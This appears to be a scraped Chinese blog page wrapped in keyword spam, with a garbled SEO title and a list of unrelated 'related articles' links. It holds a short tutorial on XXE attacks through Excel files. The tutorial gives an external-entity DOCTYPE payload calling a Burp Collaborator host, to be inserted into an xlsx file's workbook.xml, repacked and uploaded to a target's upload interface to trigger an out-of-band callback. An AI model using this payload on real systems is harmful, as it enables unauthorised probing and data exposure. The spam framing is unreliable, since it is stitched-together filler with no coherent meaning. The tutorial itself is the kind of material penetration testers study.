当前位置: 首页 > news >正文

做汽车行业必须注册际零件网站建设银行网站怎么修改手机号码吗

做汽车行业必须注册际零件网站,建设银行网站怎么修改手机号码吗,wordpress竖直导航栏,学做美食的网站利用EXCEL进行XXE攻击 原因 原因 Microsoft Office从2007版本引入了新的开放的XML文件格式,新的XML文件格式基于压缩的ZIP文件格式规范,由许多部分组成。 我们可以将其解压缩到特定的文件夹中来查看其包含的文件夹和文件,可以发现其中多数是…

利用EXCEL进行XXE攻击

  • 原因

原因

Microsoft Office从2007版本引入了新的开放的XML文件格式,新的XML文件格式基于压缩的ZIP文件格式规范,由许多部分组成。

我们可以将其解压缩到特定的文件夹中来查看其包含的文件夹和文件,可以发现其中多数是描述工作簿数据、元数据、文档信息的XML文件。

我们创建一个excle,并解压

xl/drawings/drawing1.xml
xl/worksheets/sheet1.xml
xl/worksheets/_rels/sheet1.xml.rels
xl/sharedStrings.xml
xl/styles.xml
xl/workbook.xml
xl/_rels/workbook.xml.rels
_rels/.rels
[Content_Types].xml

在这里插入图片描述
需要修改workbook.xml文件,以下内容插入第2行和第3行,SYSTEM后面自己添加相对应的dns记录均可,我习惯使用burp的collaborator模块

<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://gtdwmy7gvrncy5rvfu11kxzl2c82wr.burpcollaborator.net/"> ]>
<x>&xxe;</x>

添加好后重新打包成excle的后缀,如xxe.xlsx
此时恶意文件就做好了,找到对应的文件上传的接口,直接上传excle文件,观察dns是否有记录

http://www.yayakq.cn/news/842107/

相关文章:

  • 如何对自己建设的网站进行推广公司网站域名备案流程
  • 加强网站内容建设创新局域网下怎么访问自己做的网站
  • 找谁做网站优化hexo wordpress 区别
  • 网站建设案例 算命网站做期货要看哪些网站
  • 寻找大连网站建设碧桂园房地产最新消息
  • 宝山网站推广哔哩哔哩网页版官网在线观看
  • 重庆微信营销网站网站建设与维护合同
  • 目前做哪些网站致富沭阳做网站公司排名前十
  • 西安网站建设价格报价单模板英文
  • 品牌网站如何做wordpress 登陆 代码
  • 北京做网站制作的公司哪家好百度秒收录的网站
  • 做练习题的网站奥联网络网站建设
  • 做棋牌网站建设域名是什么意思举个例子
  • 工程建设招标中心网站网络营销自己做网站
  • 网站怎样做的有吸引力邢台经济开发区网站
  • 有什么兼职做设计的网站医美的网站主页怎么做
  • 做婚恋网站要多少钱wordpress json api 插件
  • 购物网站排名整套网站建设
  • 做外贸应该去什么网站投资项目网站建设方案
  • 学校类网站特点以下区域不属于官方网站
  • 个体工商户可以搞网站建设番号网 wordpress
  • 深圳定制网站公司做网站后期维护
  • 网站建设远程教育大学论文wordpress空间大小
  • 机械设备做公司网站龙岩网站改版较好的公司
  • 织梦手机网站有广告位咋做网站
  • 网站建设之后需要维护吗国内做化妆刷的比较好的网站
  • 黄石百度做网站多少钱做一个页面网站需要多少钱
  • 沙井网站建设公司网站建设968
  • 网站搭建网站河南seo推广公司
  • 怎样看网站是谁做的做新浪网网站所需的条件